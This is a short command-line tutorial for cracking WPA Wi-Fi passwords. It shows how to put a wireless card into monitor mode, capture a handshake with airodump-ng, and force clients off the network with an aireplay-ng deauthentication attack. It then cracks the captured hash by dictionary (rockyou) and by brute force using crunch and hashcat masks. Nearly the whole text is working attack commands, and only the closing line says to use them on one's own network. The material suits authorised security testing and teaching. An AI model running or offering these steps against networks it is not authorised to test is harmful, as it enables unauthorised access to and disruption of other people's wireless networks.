Get Handshake
install needed dependencies
sudo apt install aircrack-ng crunch -y # optionally "hashcat"
setting your interface to monitor mode
sudo airmon-ng check kill # kill processes that could interfere
sudo airmon-ng start wlan0 # set interface to monitor mode
gather network packets
sudo airodump-ng wlan0 # remember bssid and channel
sudo airodump-ng --bssid ? --channel ? --write hash wlan0
force clients to reconnect to the target network
sudo aireplay-ng -0 2 -a ? -c ? wlan0 # -a -> AP MAC, -c -> Client MAC
Crack the hash file via dictionary attack (cpu, aircrack-ng)
sudo aircrack-ng hash.cap -w /path/to/the/dictionary
get a wordlist (e.g. rockyou.txt.gz)
Kali Linux has rockyou located at /usr/share/wordlist/rockyou.txt.gz
unzip on kali linux
cd /usr/share/wordlist/
sudo gzip -d rockyou.txt.gz
cracking the hash with rockyou
sudo aircrack-ng hash.cap -w /path/to/the/dictionary # e.g. /usr/share/wordlist/rockyou.txt
Crack the hash via bruteforce (cpu, crunch/ aircrack-ng)
generate a 8-10 long password with the chracters "abcdefgABC123?"
crunch 8 10 abcdefgABC123? | sudo aircrack-ng -e wifiname -w - /path/to/the/hash/file
Crack the hash via dictionary attack (gpu, hashcat)
convert cap file from airodump-ng to hc22000 for hashcat using cap2hashcat online converter
hashcat -m 22000 hash.hc22000 rockyou.txt
Cracking the hash file via bruteforce (gpu, hashcat)
hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d # 8 digit numeric password
hashcat mask:
?l = abcdefghijklmnopqrstuvwxyz
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d = 0123456789
?s = !"#$%&'()*+,-./:;<=>?@[\]^_\`{|}~
?a = ?l?u?d?s
?b = 0x00 - 0xff
That's it!
This is just a basic tutorial.
More about hashcat can be found here.
If you have questions left contact me at contact@phoenixthrush.com and have fun cracking your OWN WIFI!